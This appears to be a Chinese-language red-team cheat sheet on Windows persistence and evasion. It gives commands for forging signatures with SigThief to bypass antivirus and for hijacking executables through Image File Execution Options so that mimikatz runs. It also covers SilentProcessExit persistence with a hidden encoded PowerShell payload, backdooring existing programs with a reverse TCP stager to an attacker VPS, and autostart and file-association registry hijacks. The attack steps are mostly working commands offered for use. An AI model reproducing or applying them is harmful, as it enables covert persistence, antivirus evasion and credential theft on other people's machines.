数字签名伪造
https://github.com/secretsquirrel/SigThief
给test.exe伪造数字签名,可以绕过少数杀毒程序
目标签名exe程序 需要与目标机器位数一致
python3 sigthief.py -i firefox.exe -t test.exe -o test1.exe
映像劫持
修改注册表(管理员权限)
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
添加想要劫持的exe的名称,再添加字符串值Debugger 值为另一个exe的路径
劫持后效果(运行getpass 实则执行mimikatz)
也可使用cmd 修改注册表(需要管理员权限)
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GetPass.exe" /v Debugger /t REG_SZ /d "exe路径"
验证
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GetPass.exe"
另一种
程序结束后 自动执行
cmd 下执行
A程序为正常运行的,B为A退出后运行
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\A.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\A.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\A.exe" /v MonitorProcess /t REG_SZ /d "B.exe路径"
效果如下
cs
生成payload
上面把B.exe路径改为 payload即可
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\A.exe" /v MonitorProcess /t REG_SZ
/d "powershell.exe -nop -w hidden -encodedcommandJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwA........"
启动A.exe 然后退出
隐藏后门
项目地址
https://github.com/secretsquirrel/the-backdoor-factory
将后门写入已存在的exe程序
判断目标exe是否支持写入木马
python backdoor.py -f 目标exe -S
查看可用payload
python backdoor.py -f 目标exe show
写入反向链接的🐎
python backdoor.py -f 目标.exe -s iat_reverse_tcp_stager_threaded -P 8888 -H vps的ip地址
选择可写入的块序号
生的木马在 backdoored 目录下
Kali msf监听 程序执行后开始反弹 ,程序关闭之后 反弹回来的shell也会随之关闭
在线查杀 只有10个报毒
自启动
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
添加load字符串 ,文件路径用短文件路径(或者添加run 字符串)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
往userinit 追加数据 用逗号分隔可以执行多程序
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce
runonce 只执行一次 注册表信息自动消失
\HKEY_CURRENT_USER\Environment
添加UserInitMprLogonScript字符串
修改文件关联注册表
exe关联 HKEY_CLASSES_ROOT\exefile\shell\open\command
将默认"%1" %* 改为 恶意exe "%1" %*
修改之后打开任意exe 都会启动恶意exe
txt关联文件
HKEY_CLASSES_ROOT\txtfile\shell\open\command
一般情况为
HKEY_CLASSES_ROOT\后缀+file\shell\open\command
跟随cmd自启动
指定cmd启动时加载的vbs脚本
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
添加字符串 键AutoRun
